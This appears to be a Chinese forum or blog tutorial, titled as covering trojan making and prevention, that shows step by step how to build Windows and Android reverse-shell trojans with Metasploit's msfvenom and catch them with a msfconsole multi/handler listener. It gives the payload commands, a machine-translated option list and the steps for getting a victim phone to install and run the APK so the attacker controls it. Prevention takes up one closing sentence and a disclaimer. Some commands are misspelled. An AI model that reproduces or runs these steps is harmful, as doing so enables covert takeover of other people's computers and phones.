木马制作和防范

前言：本期制作木马的工具是Metasploit,感兴趣的话可以下载此工具。linux---------apt-get install metasploit-framework，Windows可以到官网下载:https://windows.metasploit.com/
  一、了解metasploit：1.本期要用到的命令是 msfvenom（用来生成木马）和 msfconsole（用来监听木马）
  二、msfvenom生成木马
        1、我用的是kali linux下的metasploit
        2、在控制台输入msfvnom查看参数
        
        3、{-l、 --列出[类型]的所有模块。类型有：有效载荷、编码器、nop、平台、arch、加密、格式等等


-p、 --payload<payload>payload to use（--list payloads to list，-list options for arguments）要使用的有效负载。为“自定义”指定“-”或STDIN


--list options list——有效负载<value>的标准、高级和规避选项


-f、 --格式<格式>输出格式（使用--列出要列出的格式）


-e、 --encoder<encoder>要使用的编码器（使用--list要列出的编码器）


--服务名称<value>生成服务二进制文件时要使用的服务名称


--sec name<value>生成大型Windows二进制文件时要使用的新节名称。默认值：随机4个字符的alpha字符串


--使用所有可用的编码器生成尽可能小的有效负载


--encrypt<value>要应用于外壳代码的加密或编码类型（使用--list encrypt to list）


--encrypt key<value>要用于--encrypt的密钥


--encrypt iv<value>的初始化向量--encrypt


-a、 --arch<arch>用于--payload和--encoder的体系结构（使用--list arch to list）


--platform<platform>platform for--payload（使用--list要列出的平台）


-o、 --out<path>将有效负载保存到文件


-b、 --要避免的错误字符<list>示例：'\x00\xff'


-n、 --nopsled<length>将[length]大小的nopsled预先添加到有效负载上


--pad nop使用-n<length>指定的nopsled size作为总负载大小，自动为nopsled添加数量（nops减去负载长度）


-s、 --空间<长度>产生的有效载荷的最大大小


--编码器空间<长度>编码有效负载的最大大小（默认为-s值）


-i、 --迭代<count>对有效负载进行编码的次数


-c、 --添加代码<path>指定要包含的其他win32外壳代码文件


-x、 --template<path>指定要用作模板的自定义可执行文件


-k、 --保留--template行为并将有效负载作为新线程注入


-v、 --var name<value>指定用于某些输出格式的自定义变量名


-t、 --timeout<second>从STDIN读取有效负载时等待的秒数（默认值30，0表示禁用）


-h、 --帮助显示此消息}来自百度翻译
       三、生成木马要用到参数有 -p指定负荷 LHOST=<ip本机> LPORT=<本机端口>  -o 输出的文件；附：查看本机的ip：Windows win+r（同时按）在运行窗口输入cmd，在cmd窗口里输入ipconfig     linux-------在终端输入 sudo ifconfig   ；本机端口就可以顺便指定，前提要能记得
      例:windows木马：msfvenom -p windows/x64/shell/reverse_tcp  LHOST=<ip> LPORT=<端口> -o test.exe 附：负荷记不住怎么办？难道要一个一个抄到本子上，当然不是可以通过msfvenom -l p   （加你想找负荷的特征如Windows或linux） 附 -l是查找 p是负荷
     2、安卓木马：msfvnom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> R -o  test.apk
      四、msfconsole监听：
          1、打开msfconsole---------kali linux是直接msfconsole，Windows要设置环境变量
          不足为何上传不了图片
          2、设置监听模块：1、use exploit/multi/hander    2、set payload android/meterpreter/reverse_tcp 3.show options(查看参数)   3、set LHOST <之前的本地IP>    4、set LPORT<之前开放的端口>
          3、执行在msfconsole输入run
          4、在安卓手机上安装并运行木马文件
          5、此时msfconsole就出现一个会话
          6、此时就控制了安卓手机
结言：我们不要轻易下载软件和盲目点击链接，本文章的知识点只限与合法渗透测试，请勿用于非法用途。若用于非法用途出现问题与本人无关。由于各种因素，本贴并不详细和具体。请大家谅解一下，喜欢就点赞支持一下吧！感谢！！！